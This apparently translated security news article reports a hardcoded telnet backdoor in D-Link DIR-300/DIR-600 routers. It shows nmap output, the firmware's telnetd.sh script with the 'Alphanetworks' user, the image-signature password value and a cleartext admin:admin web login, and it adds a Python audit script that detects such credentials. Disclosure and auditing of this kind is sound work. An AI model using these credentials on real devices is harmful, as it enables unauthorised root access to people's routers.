Backdoor in D-Link routers

    A backdoor has been found in D-Link routers (DIR-300revA, DIR-300revB, DIR-600revB).

    A German researcher scanned some D-Link devices with nmap and found port 23/tcp (telnet) open on them.


    Nmap scan results
    root@bt:~# nmap -sSV -p 23 192.168.178.133,144,222
    Starting Nmap 6.01 ( nmap.org ) at 2013-04-30 13:42 CEST
    Nmap scan report for 192.168.178.133
    Host is up (0.0067s latency).
    PORT   STATE SERVICE VERSION
    23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
    MAC Address: 1C:BD:B9:A7:7F:74 (D-Link International PTE Limited)
    Service Info: Device: WAP

    Nmap scan report for 192.168.178.144
    Host is up (0.0068s latency).
    PORT   STATE SERVICE VERSION
    23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
    MAC Address: 00:26:5A:38:7D:77 (D-Link)
    Service Info: Device: WAP

    Nmap scan report for 192.168.178.222
    Host is up (0.0031s latency).
    PORT   STATE SERVICE VERSION
    23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
    MAC Address: 34:08:04:DB:6D:FE (D-Link)
    Service Info: Device: WAP


    After that the researcher looked into the firmware's config files and found
    the code for the backdoor function:

    ./rootfs/etc/scripts/misc/telnetd.sh
    #!/bin/sh
    # The password half of the backdoor credential is the firmware's image signature string
    image_sign=`cat /etc/config/image_sign`
    # telnetd is started only if the /sys/telnetd flag is set in the runtime config database
    TELNETD=`rgdb -g /sys/telnetd`
    if [ "$TELNETD" = "true" ]; then
        echo "Start telnetd..." > /dev/console
        if [ -f "/usr/sbin/login" ]; then
            lf=`rgdb -i -g /runtime/layout/lanif`
            # Hardcoded user "Alphanetworks" with the image signature as password, bound to the LAN interface
            telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &
        else
            # No login binary present: telnetd starts with its default login handling
            telnetd &
        fi
    fi
    root@bt:~/firmware/DIR300-extracted# cat rootfs/etc/config/image_sign
    wrgg19_c_dlwbr_dir300


    That is, the password depends on the firmware version in the device. This password gives root privileges on the device (see the picture below):
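As an added illustration (not code from the original article or from D-Link): a small firmware-audit script that walks an extracted rootfs, flags telnetd startup lines that carry a hardcoded -u credential, and resolves the password from the file the script reads with cat, exactly the construction telnetd.sh above uses. The sample rootfs it builds is constructed from the script lines and the image_sign value shown above.

```python
import os
import re
import tempfile

# telnetd lines carrying a baked-in "-u user:password", and name=`cat /path` assignments (the script's password source)
TELNETD_CRED = re.compile(r'\btelnetd\b[^\n]*?-u\s+(\S+?):(\S+)')
CAT_ASSIGN = re.compile(r'^\s*(\w+)=`cat\s+(\S+)`', re.M)

SAMPLE_SCRIPT = """#!/bin/sh
image_sign=`cat /etc/config/image_sign`
if [ "`rgdb -g /sys/telnetd`" = "true" ]; then
    telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &
fi
"""

def build_sample_rootfs():
    """Constructed sample: the article's telnetd.sh lines and image_sign file, laid out like an extracted rootfs."""
    root = tempfile.mkdtemp(prefix="rootfs-")
    for rel, content in (("etc/scripts/misc/telnetd.sh", SAMPLE_SCRIPT),
                         ("etc/config/image_sign", "wrgg19_c_dlwbr_dir300\n")):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root

def resolve_cat_vars(script_text, rootfs):
    """Map variables assigned via `cat /file` to that file's contents inside the rootfs."""
    values = {}
    for name, path in CAT_ASSIGN.findall(script_text):
        fs_path = os.path.join(rootfs, path.lstrip("/"))
        if os.path.isfile(fs_path):
            with open(fs_path) as fh:
                values[name] = fh.read().strip()
    return values

def find_hardcoded_telnet_creds(rootfs):
    """Return (script, user, password) for every telnetd line with a hardcoded -u credential."""
    findings = []
    for dirpath, _, files in os.walk(rootfs):
        for fname in (f for f in files if f.endswith(".sh")):
            full = os.path.join(dirpath, fname)
            with open(full, errors="replace") as fh:
                text = fh.read()
            env = resolve_cat_vars(text, rootfs)
            for user, password in TELNETD_CRED.findall(text):
                # Expand $name / ${name} from the script's own cat-assignments; unknown names stay as-is
                password = re.sub(r'\$\{?(\w+)\}?', lambda m: env.get(m.group(1), m.group(0)), password)
                findings.append((os.path.relpath(full, rootfs).replace(os.sep, "/"), user, password))
    return findings
```

Pointing find_hardcoded_telnet_creds at a real extracted rootfs (e.g. the output of binwalk) lists every startup script that bakes a telnet credential in, which is the check worth running on any firmware image before deploying it.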



    Having obtained the root password, one can also
    find the login and password for the device's web interface stored on the device in clear text:

    # cat var/etc/httpasswd
    admin:admin

    or like this:


    It should be said that this is not the first time this researcher has picked apart D-Link equipment and informed the manufacturer about bugs. However, D-Link is somehow not always in a hurry to fix them, or even states that there will be no fix because, in their opinion, the problem lies not in their equipment but in the browsers and the users of their devices.

    Source
